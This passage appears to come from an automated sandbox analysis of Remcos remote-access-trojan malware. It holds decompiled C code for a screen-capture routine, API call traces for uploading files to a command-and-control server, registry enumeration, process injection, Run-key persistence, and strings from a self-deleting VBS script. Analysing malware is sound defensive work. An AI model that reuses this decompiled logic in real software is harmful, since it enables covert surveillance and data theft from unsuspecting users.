                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                        • exit.MSVCRT ref: 004085A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 4026913539-546584676
                                        • Opcode ID: 59506b7e516daa9a8832ce67ad3f8ab0b3f2a32270095ed8dd065a46b6e6b17a
                                        • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                        • Opcode Fuzzy Hash: 59506b7e516daa9a8832ce67ad3f8ab0b3f2a32270095ed8dd065a46b6e6b17a
                                        • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040FA46, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 62%
                                        			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                        0x0040fa51
                                        0x0040fa62
                                        0x0040fa65
                                        0x0040fa6e
                                        0x0040fa7b
                                        0x0040fa89
                                        0x0040fa8c
                                        0x0040fa96
                                        0x0040fa99
                                        0x0040faac
                                        0x0040fab4
                                        0x0040fab7
                                        0x0040fae2
                                        0x0040fb08
                                        0x0040fb0b
                                        0x0040fb12
                                        0x0040fb40
                                        0x0040fb6d
                                        0x0040fb72
                                        0x0040fb82
                                        0x0040fbb0
                                        0x0040fbb5
                                        0x0040fbbf
                                        0x0040fbc5
                                        0x0040fbc5
                                        0x0040fb82
                                        0x0040fbca
                                        0x0040fbcd
                                        0x0040fbda
                                        0x0040fbfe
                                        0x0040fc02
                                        0x0040fc06
                                        0x0040fc12
                                        0x0040fc16
                                        0x0040fc22
                                        0x0040fc26
                                        0x00000000
                                        0x00000000
                                        0x0040fc2a
                                        0x0040fc2e
                                        0x00000000
                                        0x00000000
                                        0x0040fc33
                                        0x0040fcc4
                                        0x0040fccb
                                        0x0040fcd7
                                        0x0040fc3e
                                        0x0040fc46
                                        0x0040fc48
                                        0x0040fc4f
                                        0x0040fc58
                                        0x0040fc5e
                                        0x0040fc65
                                        0x0040fc6d
                                        0x0040fc71
                                        0x0040fc75
                                        0x0040fc78
                                        0x0040fc78
                                        0x0040fc83
                                        0x0040fc84
                                        0x0040fc8b
                                        0x0040fc8e
                                        0x0040fc94
                                        0x0040fc9a
                                        0x0040fc9d
                                        0x0040fca5
                                        0x0040fca8
                                        0x0040fcf4
                                        0x0040fd2b
                                        0x0040fd3c
                                        0x0040fd40
                                        0x0040fd48
                                        0x0040fd57
                                        0x0040fd5e
                                        0x0040fd6b
                                        0x0040fd7a
                                        0x0040fd87
                                        0x0040fd93
                                        0x0040fda0
                                        0x0040fdaf
                                        0x0040fdbc
                                        0x0040fdc5
                                        0x0040fdca
                                        0x0040fdd9
                                        0x0040fdde
                                        0x0040fde7
                                        0x0040fdf0
                                        0x0040fdf9
                                        0x00000000
                                        0x0040fdf9
                                        0x0040fcff
                                        0x0040fd04
                                        0x0040fd09
                                        0x0040fd0e
                                        0x0040fd14
                                        0x0040fcaa
                                        0x0040fcb3
                                        0x0040fcb8
                                        0x0040fcbd
                                        0x0040fcbf
                                        0x0040fcbf
                                        0x00000000
                                        0x0040fca8
                                        0x0040fc39
                                        0x0040fc3c
                                        0x00000000
                                        0x0040fc3c
                                        0x0040fc18
                                        0x0040fc18
                                        0x00000000
                                        0x0040fc18
                                        0x0040fc08
                                        0x00000000
                                        0x0040fbdc
                                        0x0040fbe5
                                        0x0040fbea
                                        0x0040fbef
                                        0x0040fbf1
                                        0x00000000
                                        0x0040fbf1
                                        0x0040fbda
                                        0x0040fb4b
                                        0x0040fb50
                                        0x0040fb55
                                        0x0040fb5b
                                        0x00000000
                                        0x0040fb5b
                                        0x0040faeb
                                        0x0040faf0
                                        0x0040faf5
                                        0x0040fafb
                                        0x00000000
                                        0x0040fafb
                                        0x0040fac0
                                        0x0040fac5
                                        0x0040fac8
                                        0x0040face
                                        0x00000000
                                        0x0040fa9f
                                        0x0040fa9f
                                        0x0040fd17
                                        0x0040fd20
                                        0x0040fdff
                                        0x0040fe06
                                        0x0040fe06

                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                          • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                        • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                        • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                        • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                        • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                        • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                        • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                        • GlobalFree.KERNEL32 ref: 0040FDCA
                                        • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                        • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                        • String ID: $BM$DISPLAY
                                        • API String ID: 585525397-871886180
                                        • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                        • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                        • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                        • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                        • String ID: Uploading file to C&C: $[INFO]
                                        • API String ID: 368904453-3151135581
                                        • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                        • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004130BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                        • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1820998543-3714951968
                                        • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                        • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409A2F, Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                        • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                        • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                        • wcslen.MSVCRT ref: 00409C25
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                        • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                        • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                        • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                        • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                        • API String ID: 2459104678-694575909
                                        • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                        • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                        Uniqueness

